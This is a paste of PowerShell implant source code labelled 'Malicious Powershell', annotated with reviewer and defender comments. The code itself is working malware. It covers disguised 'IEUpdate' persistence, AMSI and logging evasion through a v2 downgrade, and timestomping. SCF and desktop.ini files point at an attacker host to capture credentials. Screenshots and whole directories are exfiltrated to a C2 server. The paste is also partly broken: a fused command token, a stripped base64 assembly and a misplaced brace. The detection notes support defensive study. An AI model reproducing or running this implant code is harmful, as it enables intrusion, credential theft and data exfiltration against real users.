dissectmalware

Malicious Powershell

Jul 27th, 2018
  1. # malicious powershell
  2.  
# NOTE(review): the "LoadModule" fused to the start of this line looks like a C2
# command token captured together with the paste rather than part of the script;
# as pasted the line would not parse. The function itself reports whether this is a
# 32-bit process running under WOW64 (PROCESSOR_ARCHITEW6432 is set only in that case).
LoadModulefunction Test-Wow64() {
    return (Test-Win32) -and (test-path env:\PROCESSOR_ARCHITEW6432)
}
# True when the current PowerShell process is 64-bit (pointer size 8).
function Test-Win64() {
    return [IntPtr]::size -eq 8
}
# True when the current PowerShell process is 32-bit (pointer size 4).
function Test-Win32() {
    return [IntPtr]::size -eq 4
}
# Converts an operator-supplied interval such as "30s", "5m" or "2h" into seconds and
# stores it in $script:sleeptime. Nothing in this paste reads that variable, so it is
# presumably consumed by the implant's callback loop outside this paste.
# Defender note: this is the C2 sleep knob; the resulting cadence shows up as periodic
# outbound HTTP(S) to the C2 host at this interval.
Function Beacon($sleeptime) {
    if ($sleeptime.ToLower().Contains('m')) {
        # "Nm" -> minutes: strip the suffix and multiply out to seconds
        $sleeptime = $sleeptime -replace 'm', ''
        [int]$newsleep = $sleeptime
        [int]$newsleep = $newsleep * 60
    }
    elseif ($sleeptime.ToLower().Contains('h')) {
        # "Nh" -> hours -> seconds
        $sleeptime = $sleeptime -replace 'h', ''
        [int]$newsleep1 = $sleeptime
        [int]$newsleep2 = $newsleep1 * 60
        [int]$newsleep = $newsleep2 * 60
    }
    elseif ($sleeptime.ToLower().Contains('s')) {
        # "Ns" -> seconds; the value remains a string here (-replace returns a string)
        $newsleep = $sleeptime -replace 's', ''
    } else {
        # bare value: taken as seconds unchanged
        $newsleep = $sleeptime
    }
    $script:sleeptime = $newsleep
}
# Operator alias: "SetBeacon" is the same command as Beacon.
New-Alias SetBeacon Beacon
# Same suffix parsing as Beacon (s/m/h -> seconds), but instead of storing the value
# it blocks the implant for that long with Start-Sleep, i.e. a one-off "go quiet"
# pause during which no callbacks are made.
Function Turtle($sleeptime) {
    if ($sleeptime.ToLower().Contains('m')) {
        # minutes -> seconds
        $sleeptime = $sleeptime -replace 'm', ''
        [int]$newsleep = $sleeptime
        [int]$newsleep = $newsleep * 60
    }
    elseif ($sleeptime.ToLower().Contains('h')) {
        # hours -> seconds
        $sleeptime = $sleeptime -replace 'h', ''
        [int]$newsleep1 = $sleeptime
        [int]$newsleep2 = $newsleep1 * 60
        [int]$newsleep = $newsleep2 * 60
    }
    elseif ($sleeptime.ToLower().Contains('s')) {
        $newsleep = $sleeptime -replace 's', ''
    } else {
        $newsleep = $sleeptime
    }
    Start-Sleep $newsleep
}
# Reports the implant/OS bitness combination to the operator, flags
# $global:ImpUpgrade when a 32-bit implant runs on 64-bit Windows (so
# StartAnotherImplant can relaunch via the sysnative path), and then checks whether
# amsi.dll is loaded in the current process.
# Defender note: the amsi.dll module check plus the prompt to "Unhook-AMSI" marks this
# as tooling that intends to tamper with AMSI; see Unhook-AMSI below for detection.
Function CheckArchitecture
{
    if (Test-Win64) {
        Write-Output "64bit implant running on 64bit machine"
    }
    elseif ((Test-Win32) -and (-Not (Test-Wow64))) {
        Write-Output "32bit running on 32bit machine"
    }
    elseif ((Test-Win32) -and (Test-Wow64)) {
        # consumed by StartAnotherImplant to pick the 64-bit PowerShell path
        $global:ImpUpgrade = $True
        Write-Output "32bit implant running on a 64bit machine, use StartAnotherImplant to upgrade to 64bit"
    }
    else {
        Write-Output "Unknown Architecture Detected"
    }
    # enumerate modules loaded into this PowerShell process and report if AMSI is present
    get-process -id $pid -module |%{ if ($_.modulename -eq "amsi.dll") {echo "`n[+] AMSI Detected. Run Unhook-AMSI to unload Anti-Malware Scan Interface (AMSI)"} }
}
# Dumps the current user's WinINet proxy settings from the registry
# (ProxyEnable/ProxyServer/AutoConfigURL etc.), presumably so C2 traffic can be
# routed through the corporate proxy — the consumer is not in this paste.
Function Get-Proxy {
    Get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings"
}
# Tells the operator when the engine is NOT PowerShell v2, i.e. when AMSI, Constrained
# Language Mode and ScriptBlock/Module logging may be active, and suggests injecting
# the "v2 shellcode" instead.
# Defender note: this is the motivation for the downgrade tooling below. Removing the
# PowerShell 2.0 optional feature (or alerting on engine start events that report
# EngineVersion 2.0) takes away the logging-free environment this tooling looks for.
Function CheckVersionTwo
{
    $psver = $PSVersionTable.psversion.Major
    if ($psver -ne '2') {
        Write-Output "`n[+] Powershell version $psver detected. Run Inject-Shellcode with the v2 Shellcode"
        Write-Output "[+] Warning AMSI, Constrained Mode, ScriptBlock/Module Logging could be enabled"
    }
}
# Module load-time actions: reset the upgrade flag, then run the two environment
# checks above so their output is returned to the operator as soon as the module loads.
$global:ImpUpgrade = $False
CheckArchitecture
CheckVersionTwo
# Spawns a second implant by launching a hidden cmd.exe that runs $payload. $payload
# is not defined anywhere in this paste — it comes from the implant's outer scope and
# presumably holds the powershell.exe launcher command line. When ImpUpgrade is set
# (32-bit implant on 64-bit OS) the sysnative alias is used so the child is 64-bit.
# Defender note: the resulting process tree is powershell.exe -> cmd.exe -> powershell.exe
# with a hidden window; that parent/child chain is a high-signal detection.
Function StartAnotherImplant {
    if (($p = Get-Process | ? {$_.id -eq $pid}).name -ne "powershell") {
        echo "Process is not powershell, try running migrate -x86 or migrate -x64"
    } else {
        if ($global:ImpUpgrade) {
            echo "Start-Process Upgrade via CMD"
            # sysnative is the 64-bit System32 as seen from a 32-bit process
            start-process -windowstyle hidden cmd -args "/c `"$env:windir\sysnative\windowspowershell\v1.0\$payload`""
        } else {
            echo "Start-Process via CMD"
            start-process -windowstyle hidden cmd -args "/c $payload"
        }
    }
}
# Operator shorthands. invoke-smbexec is not defined in this paste (external module).
sal S StartAnotherImplant
sal SAI StartAnotherImplant
sal invoke-smblogin invoke-smbexec
# Rewrites the launcher so powershell.exe is started with "-v 2" (the PowerShell 2.0
# engine) and relaunches it via StartAnotherImplant, which reads $payload from this
# calling scope.
# Defender note: "powershell -v 2" / "-version 2" on a command line, and engine start
# events reporting version 2.0 on a host with a newer PowerShell, indicate a downgrade
# to evade AMSI and script block logging.
Function Invoke-DowngradeAttack
{
    $payload = $payload -replace "-exec", "-v 2 -exec"
    StartAnotherImplant
}
# True when the current token is a member of the built-in Administrators role
# (i.e. running elevated when UAC is in effect).
function Test-Administrator  
{  
    $user = [Security.Principal.WindowsIdentity]::GetCurrent();
    (New-Object Security.Principal.WindowsPrincipal $user).IsInRole([Security.Principal.WindowsBuiltinRole]::Administrator)  
}
# True when a command/cmdlet named $cmdname is resolvable in this session.
function Check-Command($cmdname)
{
    return [bool](Get-Command -Name $cmdname -ErrorAction SilentlyContinue)
    # unreachable: follows the return statement
    $error.clear()
}
# Enables Remote Desktop when running as administrator: clears fDenyTSConnections,
# requires NLA (UserAuthentication = 1), and opens the firewall for RDP — via the
# NetSecurity cmdlets on PowerShell 3+ or netsh on v2.
# Defender note: monitor writes to fDenyTSConnections, new/enabled "Remote Desktop"
# firewall rules and netsh advfirewall command lines; an unexpected 3389 listener
# appearing on a workstation is a strong lateral-movement/persistence indicator.
function EnableRDP
{
    if (Test-Administrator) {
        set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 0
        set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 1  
        $psver = $PSVersionTable.psversion.Major
        if ($psver -ne '2')
        {
            Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -enabled true
        } else {
            # PowerShell 2 has no NetSecurity module; fall back to netsh
            netsh advfirewall firewall add rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389
        }
    } else {
    Write-Output "You are not elevated to Administator "
    }
}
# Reverses EnableRDP: sets fDenyTSConnections back to 1, turns NLA off
# (UserAuthentication = 0) and disables/deletes the "Remote Desktop" firewall rule.
# IR note: the "clean-up" leaves NLA disabled, which is weaker than the pre-attack
# default on most systems — check this value when remediating.
function DisableRDP
{
    if (Test-Administrator) {
        set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server'-name "fDenyTSConnections" -Value 1
        set-ItemProperty -Path 'HKLM:\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp' -name "UserAuthentication" -Value 0
        $psver = $PSVersionTable.psversion.Major
        if ($psver -ne '2')
        {
            Get-NetFirewallRule -DisplayName "Remote Desktop*" | Set-NetFirewallRule -enabled false
        } else {
            netsh advfirewall firewall del rule name="Remote Desktop" dir=in action=allow protocol=TCP localport=3389
        }
    } else {
    Write-Output "You are not elevated to Administator "
    }
}
# Drops a Shell Command File (~T0P0092.jpg.scf) into $Location whose IconFile points
# at a UNC path on $IPaddress. Explorer resolves that icon over SMB when a user merely
# views the folder, so anyone browsing the share authenticates to the attacker host.
# Defender note: block outbound SMB (TCP 445) at the perimeter, alert on .scf files
# created on file shares, and treat "~T0P0092.jpg.scf" as an IOC for this tooling.
function Write-SCFFile
{
    Param ($IPaddress, $Location)
    "[Shell]" >$Location\~T0P0092.jpg.scf
    "Command=2" >> $Location\~T0P0092.jpg.scf;
    "IconFile=\\$IPaddress\remote.ico" >> $Location\~T0P0092.jpg.scf;
    "[Taskbar]" >> $Location\~T0P0092.jpg.scf;
    "Command=ToggleDesktop" >> $Location\~T0P0092.jpg.scf;
    Write-Output "Written SCF File: $Location\~T0P0092.jpg.scf"
}
# Same technique as Write-SCFFile using a hidden desktop.ini: IconResource points at a
# UNC path on $IPaddress, so Explorer fetches it over SMB when the folder is opened.
# Defender note: an unexpected desktop.ini with a UNC IconResource on a share is an IOC;
# the Hidden attribute means `Get-ChildItem -Force` / `dir /a` is needed to see it.
function Write-INIFile
{
    Param ($IPaddress, $Location)
    "[.ShellClassInfo]" > $Location\desktop.ini
    "IconResource=\\$IPAddress\resource.dll" >> $Location\desktop.ini
    # hide the file so casual browsing does not reveal it
    $a = Get-item $Location\desktop.ini -Force; $a.Attributes="Hidden"
    Write-Output "Written INI File: $Location\desktop.ini"
}
# Installs user-level persistence. In every method the launcher ($payload, from the
# implant's outer scope) is stashed in a registry value under
# HKCU\Software\Microsoft\Windows\CurrentVersion\Themes and a small powershell.exe
# stub re-reads and iex's it at logon/schedule time:
#   1 (default): Run key value "IEUpdate" + Themes value "Wallpaper777"
#   2: scheduled task "IEUpdate" every 240 minutes + Themes value "Wallpaper555"
#   3: Startup-folder shortcut "IEUpdate.lnk" + Themes value "Wallpaper666"
# Defender/IR note: the three Wallpaper### value names, the IEUpdate Run value, the
# IEUpdate task and the IEUpdate.lnk shortcut are all host IOCs. The stub command line
# (powershell -exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty ...))
# is a good detection string on its own.
Function Install-Persistence
{
    Param ($Method)
    if (!$Method){$Method=1}
    if ($Method -eq 1) {
        Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777 -value "$payload"
        Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate -value "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper777"
        # read both values back to confirm the writes landed
        $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
        $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
        if (($registrykey.IEUpdate) -and ($registrykey2.Wallpaper777)) {
        Write-Output "Successfully installed persistence: `n Regkey: HKCU\Software\Microsoft\Windows\currentversion\run\IEUpdate `n Regkey2: HKCU\Software\Microsoft\Windows\currentversion\themes\Wallpaper777"
        } else {
        Write-Output "Error installing persistence"
        }
    }
    if ($Method -eq 2) {
        Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555 -value "$payload"
        $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
        # /sc minute /mo 240 -> fires every four hours under the current user
        schtasks.exe /create /sc minute /mo 240 /tn "IEUpdate" /tr "powershell -exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper555"
        If ($registrykey.Wallpaper555) {
            Write-Output "Created scheduled task persistence every 4 hours"
        }
    }
    if ($Method -eq 3) {
        Set-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666 -value "$payload"
        $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
        $SourceExe = "powershell.exe"
        $ArgumentsToSourceExe = "-exec bypass -Noninteractive -windowstyle hidden -c iex (Get-ItemProperty -Path Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\).Wallpaper666"
        $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\IEUpdate.lnk"
        # build the .lnk through the WScript.Shell COM object
        $WshShell = New-Object -comObject WScript.Shell
        $Shortcut = $WshShell.CreateShortcut($DestinationPath)
        $Shortcut.TargetPath = $SourceExe
        $Shortcut.Arguments = $ArgumentsToSourceExe
        # WindowStyle 7 = minimised
        $Shortcut.WindowStyle = 7
        $Shortcut.Save()
        If ((Test-Path $DestinationPath) -and ($registrykey2.Wallpaper666)) {
            Write-Output "Created StartUp folder persistence and added RegKey`n Regkey: HKCU\Software\Microsoft\Windows\currentversion\themes\Wallpaper666"
        } else {
            Write-Output "Error installing StartUp folder persistence"
        }
    }
}
# Startup-folder persistence for a dropped executable: creates WinLogon.lnk that runs
# rundll32 shell32.dll,ShellExec_RunDLL to launch %temp%\winlogon.exe, then back-dates
# the shortcut's timestamps to 2008 with TimeStomp. The winlogon.exe itself is not
# written here — presumably placed earlier with Upload-File (the success check only
# tests that it exists).
# Defender/IR note: a rundll32 ShellExec_RunDLL shortcut in the Startup folder, and any
# winlogon.exe outside %SystemRoot%\System32, are IOCs; compare the .lnk's
# $STANDARD_INFORMATION times against $FILE_NAME / USN journal records to spot the stomp.
Function InstallExe-Persistence() {
        $SourceEXE = "rundll32.exe"
        $ArgumentsToSourceExe = "shell32.dll,ShellExec_RunDLL %temp%\winlogon.exe"
        $DestinationPath = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
        $WshShell = New-Object -comObject WScript.Shell
        $Shortcut = $WshShell.CreateShortcut($DestinationPath)
        $Shortcut.TargetPath = $SourceEXE
        $Shortcut.Arguments = $ArgumentsToSourceExe
        $Shortcut.WindowStyle = 7
        $Shortcut.Save()
        # anti-forensics: make the new shortcut look years old
        TimeStomp $DestinationPath "01/03/2008 12:12 pm"
        If ((Test-Path $DestinationPath) -and (Test-Path "$env:Temp\Winlogon.exe")) {
            Write-Output "Created StartUp file Exe persistence: $DestinationPath"
        } else {
            Write-Output "Error installing StartUp Exe persistence"
        }
}
# Undoes InstallExe-Persistence: deletes %temp%\winlogon.exe and the WinLogon.lnk
# shortcut, then reports whether either still exists.
# IR note: deleting the files does not remove the prefetch, USN journal or shortcut
# (.lnk/RecentDocs) traces they leave; those remain available for reconstruction.
Function RemoveExe-Persistence() {
        $DestinationPath1 = "$env:Temp\winlogon.exe"
        Remove-Item -Force $DestinationPath1
        $DestinationPath2 = "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup\WinLogon.lnk"
        Remove-Item -Force $DestinationPath2
        # $DestinationPath is never assigned in this function, so this call receives an
        # empty path (the two real paths are $DestinationPath1/$DestinationPath2)
        TimeStomp $DestinationPath "01/03/2008 12:12 pm"
        If ((Test-Path $DestinationPath1) -or ((Test-Path $DestinationPath2))) {
            Write-Output "Unable to Remove Persistence"
        } else {
            Write-Output "Persistence Removed"
        }
}
# Removes the artifacts created by Install-Persistence for the given method.
# IR note: as written, the closing brace of the Method 1 block sits after the Method 2
# and Method 3 blocks, so those two only run when $Method is 1 — i.e. never. Method 3
# also deletes from a "StartMenu" path that differs from the "Start Menu" path used at
# install time. Expect the IEUpdate scheduled task, the Wallpaper555/Wallpaper666
# values and the Startup IEUpdate.lnk to survive an operator "clean-up"; check for
# them explicitly during remediation.
Function Remove-Persistence
{
    Param ($Method)
    if (!$Method){$Method=1}
    if ($Method -eq 1) {
        Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
        Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
        $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\run\" IEUpdate
        $registrykey2 = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper777
        if (($registrykey -eq $null) -and ($registrykey2 -eq $null)) {
        Write-Output "Successfully removed persistence from registry!"
        $error.clear()
        } else {
        Write-Output "Error removing persistence, remove registry keys manually!"
        $error.clear()
    }
    # --- the following two blocks are still inside the "$Method -eq 1" block above ---
    if ($Method -eq 2) {
        schtasks.exe /delete /tn IEUpdate /F
        Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
        $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper555
        if ($registrykey -eq $null) {
            Write-Output "Successfully removed persistence from registry!"
            Write-Output "Removed scheduled task persistence"
        }else {
            Write-Output "Error removing SchTasks persistence"
        }
    }
    if ($Method -eq 3) {
        Remove-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
        $registrykey = get-ItemProperty -Path "Registry::HKCU\Software\Microsoft\Windows\currentversion\themes\" Wallpaper666
        # note "StartMenu" (no space) — not the folder Install-Persistence wrote to
        Remove-Item "$env:APPDATA\Microsoft\Windows\StartMenu\Programs\Startup\IEUpdate.lnk"
        # $DestinationPath is not set in this function; the success message text is also
        # the install-error text
        If ((Test-Path $DestinationPath) -and ($registrykey.Wallpaper666)) {
            Write-Output "Removed StartUp folder persistence"
        }else {
            Write-Output "Error installing StartUp folder persistence"
        }
    }
}
}
# Despite the name, this DOWNLOADS: fetches the URL $From and writes it to the local
# path $To using the implant's Get-Webclient helper (defined outside this paste, so its
# proxy/User-Agent/cookie behaviour is not visible here).
Function Web-Upload-File
{
    Param
    (
        [string]
        $From,
        [string]
        $To
    )
    (Get-Webclient).DownloadFile($From,$To)
}
# Extracts $file into $destination via the Shell.Application COM object (works on
# PowerShell 2, which lacks Expand-Archive). Note copyhere may show Explorer progress
# UI for large archives; both paths should be absolute for the COM call.
function Unzip($file, $destination)
{
    $shell = new-object -com shell.application
    $zip = $shell.NameSpace($file)
    foreach($item in $zip.items())
    {
        $shell.Namespace($destination).copyhere($item)
    }
}
# Decodes a base64 text file into a binary file in 90000-character chunks (90000 is a
# multiple of 4, so each chunk is a whole number of base64 quads). Used to rebuild
# binaries staged on disk as text.
# Note: the reader/writer are not disposed in a finally block, so a decode error
# leaves both handles open until garbage collection.
function ConvertFrom-Base64
{
    param
    (
        [string] $SourceFilePath,
        [string] $TargetFilePath
    )
 
    # resolve relative paths without requiring the target to exist yet
    $SourceFilePath = Resolve-PathSafe $SourceFilePath
    $TargetFilePath = Resolve-PathSafe $TargetFilePath
 
    $bufferSize = 90000
    $buffer = New-Object char[] $bufferSize
     
    $reader = [System.IO.File]::OpenText($SourceFilePath)
    $writer = [System.IO.File]::OpenWrite($TargetFilePath)
     
    $bytesRead = 0
    do
    {
        $bytesRead = $reader.Read($buffer, 0, $bufferSize);
        $bytes = [Convert]::FromBase64CharArray($buffer, 0, $bytesRead);
        $writer.Write($bytes, 0, $bytes.Length);
    } while ($bytesRead -eq $bufferSize);   # a short read means end of input
     
    $reader.Dispose()
    $writer.Dispose()
}
# Checks a username/password against the domain with PrincipalContext.ValidateCredentials
# and returns an object carrying the plaintext password plus an IsValid string.
# Defender note: called in a loop this is password spraying/brute force — each call is
# an LDAP bind against a DC, so watch for bursts of 4625/4776 failures from one host.
Function Test-ADCredential
{
    Param($username, $password, $domain)
    Add-Type -AssemblyName System.DirectoryServices.AccountManagement
    $ct = [System.DirectoryServices.AccountManagement.ContextType]::Domain
    $pc = New-Object System.DirectoryServices.AccountManagement.PrincipalContext($ct, $domain)
    $object = New-Object PSObject | Select Username, Password, IsValid
    $object.Username = $username;
    $object.Password = $password;
    $object.IsValid = $pc.ValidateCredentials($username, $password).ToString();
    return $object
}
# Takes $Quantity screenshots $Timedelay seconds apart and uploads each one to the C2.
# $key, $Server, $ReadCommand, Encrypt-String2, getimgdata and Get-Webclient all come
# from the implant core outside this paste; $ReadCommand is used as the upload cookie
# but is never set in this function, so it is whatever the caller's scope holds.
# Defender note: a burst of same-sized outbound POSTs to one host at a fixed interval
# from powershell.exe is the network-side signature of this loop.
Function Get-ScreenshotMulti {
    param($Timedelay, $Quantity)
 
    if ($Quantity -and $Timedelay) {
        ForEach ($number in 1..[int]$Quantity ) {
            $Output = Get-Screenshot        
            # encrypt the base64 PNG, wrap it (getimgdata) and POST it to the C2
            $Output = Encrypt-String2 $key $Output
            $UploadBytes = getimgdata $Output
            (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
            Start-Sleep $Timedelay
        }
    }
}
# Captures the whole virtual desktop (all monitors) with System.Drawing.
# Returns the PNG as a base64 string, or — when $File is given — saves the PNG to that
# path and returns $null ($b64 is only assigned in the else branch).
Function Get-Screenshot
{
    param($File)
 
    #import libraries
    Add-Type -AssemblyName System.Windows.Forms
    Add-type -AssemblyName System.Drawing
 
    # Gather Screen resolution information
    $Screen = [System.Windows.Forms.SystemInformation]::VirtualScreen
    $Width = $Screen.Width
    $Height = $Screen.Height
    $Left = $Screen.Left
    $Top = $Screen.Top
 
    # Create bitmap using the top-left and bottom-right bounds
    $bitmap = New-Object System.Drawing.Bitmap $Width, $Height
 
    # Create Graphics object
    $graphic = [System.Drawing.Graphics]::FromImage($bitmap)
 
    # Capture screen
    $graphic.CopyFromScreen($Left, $Top, 0, 0, $bitmap.Size)
 
    # Send back as base64
    $msimage = New-Object IO.MemoryStream
   
    if ($File) {
        # on-disk variant: leaves a PNG artifact at $File
        $bitmap.save($file, "png")
    } else {
        $bitmap.save($msimage, "png")
        $b64 = [Convert]::ToBase64String($msimage.toarray())
    }
    return $b64
}
# load-once flag for the window-capture assembly used by Get-ScreenshotAllWindows
$psloadedscreen = $null
# Screenshots every process's main window individually and uploads each as a BMP.
# On first use it loads a helper .NET assembly straight from memory
# ([Reflection.Assembly]::Load on a byte array) that provides [WindowStation]::Capture.
# NOTE(review): the base64 assembly that followed `$ps = "` has been stripped from
# this paste, leaving an unterminated string — as pasted, the rest of the file would
# not parse.
# Defender note: in-memory Assembly.Load from a byte[] inside powershell.exe is a
# common fileless-loading pattern; .NET runtime ETW (assembly load events) and AMSI's
# assembly scanning on current frameworks both surface it. All errors are swallowed.
function Get-ScreenshotAllWindows {
 
    if ($psloadedscreen -ne "TRUE") {
        $script:psloadedscreen = "TRUE"
        $ps = "
        $dllbytes  = [System.Convert]::FromBase64String($ps)
        $assembly = [System.Reflection.Assembly]::Load($dllbytes)
    }
 
    $processes = Get-Process
    foreach ($p in $processes)
    {
        try {
            [IntPtr] $windowHandle = $p.MainWindowHandle;
            $msimage = New-Object IO.MemoryStream
            $bitmap = [WindowStation]::Capture($windowHandle);
            $bitmap.save($msimage, "bmp")
            $b64 = [Convert]::ToBase64String($msimage.toarray())
            $bitmap.Dispose();
            # the encrypted command name travels in the Cookie header, the image in the body
            $ReadCommand = "get-screenshot"
            $ReadCommand = Encrypt-String $key $ReadCommand
            $send = Encrypt-String2 $key $b64
            $UploadBytes = getimgdata $send
            (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
        } catch {}   # processes without a window, or capture failures, are skipped silently
    }
    $error.clear()
}
# Exfiltrates an entire directory tree: every non-container item under $Directory is
# passed to Download-File (which sends it to the C2 server).
# Defender note: the result is a long series of chunked POSTs from one host; DLP/egress
# volume alerts on powershell.exe are the practical detection.
function Download-Files
{
    param
    (
        [string] $Directory
    )
    $files = Get-ChildItem $Directory -Recurse | Where-Object{!($_.PSIsContainer)}
    foreach ($item in $files)
    {
        Download-File $item.FullName
    }
}
# Returns a random string of $Length characters drawn from [a-z0-9].
function Get-RandomName
{
    param
    (
        [int]$Length
    )
    $set    = 'abcdefghijklmnopqrstuvwxyz0123456789'.ToCharArray()
    $result = ''
    for ($x = 0; $x -lt $Length; $x++)
    {$result += $set | Get-Random}
    return $result
}
# "Download" from the operator's point of view: reads the victim file $Source and
# sends it to the C2 in chunks of $bufferSize (10737418 bytes, ~10 MiB). Each upload
# body is a 10-byte header — the 5-digit chunk index followed by the 5-digit total —
# plus the raw chunk, encrypted with Encrypt-Bytes; the Cookie header carries the
# encrypted command "download-file <path>" so the server knows what it is receiving.
# Errors are reported back to the C2 the same way rather than to the console.
# $key, $Server, Encrypt-String, Encrypt-Bytes, Encrypt-String2, getimgdata and
# Get-Webclient come from the implant core outside this paste.
# Defender note: repeated ~10 MiB POSTs with a Cookie header to a single external host
# from powershell.exe is the network signature to hunt for.
function Download-File
{
    param
    (
        [string] $Source
    )
    try {
        $fileName = Resolve-PathSafe $Source
        # $randomName, $fileExt and $fileNameOnly are computed but never used below
        $randomName = Get-RandomName -Length 5
        $fileExt = [System.IO.Path]::GetExtension($fileName)
        $fileNameOnly = [System.IO.Path]::GetFileNameWithoutExtension($fileName)
        $fullNewname = $Source
        $bufferSize = 10737418;
 
        # FileShare.ReadWrite lets locked/in-use files (e.g. open documents) be read
        $fs = [System.IO.File]::Open($fileName, [System.IO.FileMode]::Open, [System.IO.FileAccess]::Read, [System.IO.FileShare]::ReadWrite);        
        $fileSize =(Get-Item $fileName).Length
       
        $chunkSize = $fileSize / $bufferSize
        $totalChunks = [int][Math]::Ceiling($chunkSize)
        if ($totalChunks -lt 1) {$totalChunks = 1}
        # five-digit, zero-padded total chunk count for the header
        $totalChunkStr = $totalChunks.ToString("00000")
        $totalChunkByte = [System.Text.Encoding]::UTF8.GetBytes($totalChunkStr)
        $Chunk = 1
        # $size duplicates $fileSize and drives the loop's remaining-bytes countdown
        $finfo = new-object System.IO.FileInfo ($fileName)
        $size = $finfo.Length
        $str = New-Object System.IO.BinaryReader($fs);
        do {
            $ChunkStr = $Chunk.ToString("00000")
            $ChunkedByte = [System.Text.Encoding]::UTF8.GetBytes($ChunkStr)
            # the 10-byte allocation is immediately replaced by the concatenated header
            $preNumbers = New-Object byte[] 10
            $preNumbers = ($ChunkedByte+$totalChunkByte)
            $readSize = $bufferSize;
            $chunkBytes = $str.ReadBytes($readSize);
            $ReadCommand = "download-file "+$fullNewname
            $ReadCommand = Encrypt-String $key $ReadCommand
            $send = Encrypt-Bytes $key ($preNumbers+$chunkBytes)
            $UploadBytes = getimgdata $send
            (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
            ++$Chunk
        } until (($size -= $bufferSize) -le 0);
    } catch {
        # failure is reported to the C2, not to the local console
        $Output = "ErrorCmd: " + $error[0]
        $ReadCommand = "Error downloading file "+$fullnewname
        $ReadCommand = Encrypt-String $key $ReadCommand  
        $send = Encrypt-String2 $key $output
        $UploadBytes = getimgdata $send
        (Get-Webclient -Cookie $ReadCommand).UploadData("$Server", $UploadBytes)|out-null
    }
}
# Anti-forensic delete: clears the file's attributes, overwrites its full length with
# random bytes, then removes it so the content cannot be recovered by undeleting.
# IR note: the content is gone, but the MFT record, USN journal entries, prefetch and
# any volume shadow copies still record that the file existed (and its original size).
function Posh-Delete
{
    param
    (
        [string] $Destination
    )
    try {
    $file = Get-Item $Destination -Force
    # drop Hidden/System/ReadOnly so the overwrite and delete succeed
    $file.Attributes = "Normal"
    $content = New-Object Byte[] $file.length
    (New-Object Random).NextBytes($content)
    [IO.File]::WriteAllBytes($file,$content)
    Remove-Item $Destination -Force
    } catch {
    echo $error[0]
    }
}
# Writes a base64-encoded blob from the operator to $Destination and marks the file
# Hidden+System so it is not shown by default listings. The two status lines are
# printed before the write, so they appear even if the write then fails (the catch
# prints the error afterwards).
# IR note: hunt for Hidden+System files in user-writable locations
# (`Get-ChildItem -Force -Attributes Hidden,System` or `dir /a:hs`).
function Upload-File
{
    param
    (
        [string] $Base64,
        [string] $Destination
    )
    try {
    write-output "Uploaded file as HIDDEN & SYSTEM to: $Destination"
    write-output "Run Get-ChildItem -Force to view the uploaded files"
    $fileBytes = [Convert]::FromBase64String($Base64)
    [io.file]::WriteAllBytes($Destination, $fileBytes)
    $file = Get-Item $Destination -Force
    $attrib = $file.Attributes
    # the read above is discarded; attributes are replaced, not OR'd
    $attrib = "Hidden,System"
    $file.Attributes = $attrib  
    } catch {
    echo $error[0]
    }  
}
# Turns a relative or PSDrive path into a full provider path WITHOUT requiring the
# target to exist (unlike Resolve-Path), so it can be used for files about to be created.
function Resolve-PathSafe
{
    param
    (
        [string] $Path
    )
     
    $ExecutionContext.SessionState.Path.GetUnresolvedProviderPathFromPSPath($Path)
}
# Prepares a remote host for WinRM lateral movement with a weakened configuration:
# locally it sets LocalAccountTokenFilterPolicy=1 (removes UAC token filtering for
# remote local-admin logons) and TrustedHosts=*, then via WMI Win32_Process.Create on
# $computer it runs Set-WSManQuickConfig and enables Basic auth and AllowUnencrypted.
# Note: $getcreds is referenced in the two Invoke-Command calls before it is assigned
# three lines later, so those local calls run with whatever the calling scope holds.
